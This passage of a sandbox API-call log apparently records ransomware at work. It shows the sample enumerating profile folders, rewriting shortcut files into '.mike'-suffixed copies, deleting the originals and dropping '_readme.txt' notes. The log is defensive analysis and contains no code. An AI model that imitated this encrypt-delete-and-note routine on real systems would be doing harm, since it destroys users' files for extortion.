ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xe03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0158.796] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xdd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0158.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xdfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0158.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0158.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xe03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0158.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xdd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0158.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xdfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0158.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0158.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 0 [0158.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.803] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.803] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.803] CoTaskMemFree (pv=0x508980) [0158.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.804] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.807] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.807] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.807] CoTaskMemFree (pv=0x508980) [0158.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.809] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.809] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.810] CoTaskMemFree (pv=0x508980) [0158.810] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.810] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.811] CoTaskMemFree (pv=0x508980) [0158.811] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.811] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.811] CoTaskMemFree (pv=0x508980) [0158.813] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.813] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.813] CoTaskMemFree (pv=0x508980) [0158.813] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.813] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.814] CoTaskMemFree (pv=0x508980) [0158.821] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.821] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.822] CoTaskMemFree (pv=0x508980) [0158.824] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.827] GetFileType (hFile=0x1c8) returned 0x1 [0158.827] GetFileType (hFile=0x1c8) returned 0x1 [0158.827] CloseHandle (hObject=0x1c8) returned 1 [0158.827] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.828] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.829] GetFileType (hFile=0x1c8) returned 0x1 [0158.829] GetFileType (hFile=0x1c8) returned 0x1 [0158.829] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x0 [0158.830] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.830] GetFileType (hFile=0x1c8) returned 0x1 [0158.831] GetFileType (hFile=0x1c8) returned 0x1 [0158.831] ReadFile (in: hFile=0x1c8, lpBuffer=0x224e324, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aeff0, lpOverlapped=0x0 | out: lpBuffer=0x224e324*, lpNumberOfBytesRead=0x2aeff0*=0x4d6, lpOverlapped=0x0) returned 1 [0158.834] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.834] GetFileType (hFile=0x1c8) returned 0x1 [0158.834] GetFileType (hFile=0x1c8) returned 0x1 [0158.834] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x220 [0158.835] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.835] GetFileType (hFile=0x1c8) returned 0x1 [0158.835] GetFileType (hFile=0x1c8) returned 0x1 [0158.836] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk", dwFileAttributes=0x80) returned 1 [0158.837] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk")) returned 1 [0158.838] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.839] GetFileType (hFile=0x1c8) returned 0x1 [0158.839] GetFileType (hFile=0x1c8) returned 0x1 [0158.840] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.840] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.840] CoTaskMemFree (pv=0x508980) [0158.841] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.841] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.841] CoTaskMemFree (pv=0x508980) [0158.850] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.851] GetFileType (hFile=0x1c8) returned 0x1 [0158.851] GetFileType (hFile=0x1c8) returned 0x1 [0158.851] CloseHandle (hObject=0x1c8) returned 1 [0158.851] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0158.852] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.853] GetFileType (hFile=0x1c8) returned 0x1 [0158.853] GetFileType (hFile=0x1c8) returned 0x1 [0158.853] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x0 [0158.854] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.855] GetFileType (hFile=0x1c8) returned 0x1 [0158.855] GetFileType (hFile=0x1c8) returned 0x1 [0158.855] ReadFile (in: hFile=0x1c8, lpBuffer=0x226cb78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aefa8, lpOverlapped=0x0 | out: lpBuffer=0x226cb78*, lpNumberOfBytesRead=0x2aefa8*=0x587, lpOverlapped=0x0) returned 1 [0158.857] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.857] GetFileType (hFile=0x1c8) returned 0x1 [0158.858] GetFileType (hFile=0x1c8) returned 0x1 [0158.858] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x220 [0158.859] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.859] GetFileType (hFile=0x1c8) returned 0x1 [0158.859] GetFileType (hFile=0x1c8) returned 0x1 [0158.860] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk", dwFileAttributes=0x80) returned 1 [0158.861] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk")) returned 1 [0158.862] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.863] GetFileType (hFile=0x1c8) returned 0x1 [0158.863] GetFileType (hFile=0x1c8) returned 0x1 [0158.864] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.864] GetFileType (hFile=0x1c8) returned 0x1 [0158.864] GetFileType (hFile=0x1c8) returned 0x1 [0158.865] CloseHandle (hObject=0x1c8) returned 1 [0158.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0158.866] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.866] GetFileType (hFile=0x1c8) returned 0x1 [0158.866] GetFileType (hFile=0x1c8) returned 0x1 [0158.866] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x0 [0158.868] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.868] GetFileType (hFile=0x1c8) returned 0x1 [0158.868] GetFileType (hFile=0x1c8) returned 0x1 [0158.868] ReadFile (in: hFile=0x1c8, lpBuffer=0x227e2d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aefa8, lpOverlapped=0x0 | out: lpBuffer=0x227e2d4*, lpNumberOfBytesRead=0x2aefa8*=0x5a9, lpOverlapped=0x0) returned 1 [0158.871] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.871] GetFileType (hFile=0x1c8) returned 0x1 [0158.871] GetFileType (hFile=0x1c8) returned 0x1 [0158.871] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x220 [0158.872] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.872] GetFileType (hFile=0x1c8) returned 0x1 [0158.872] GetFileType (hFile=0x1c8) returned 0x1 [0158.873] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet 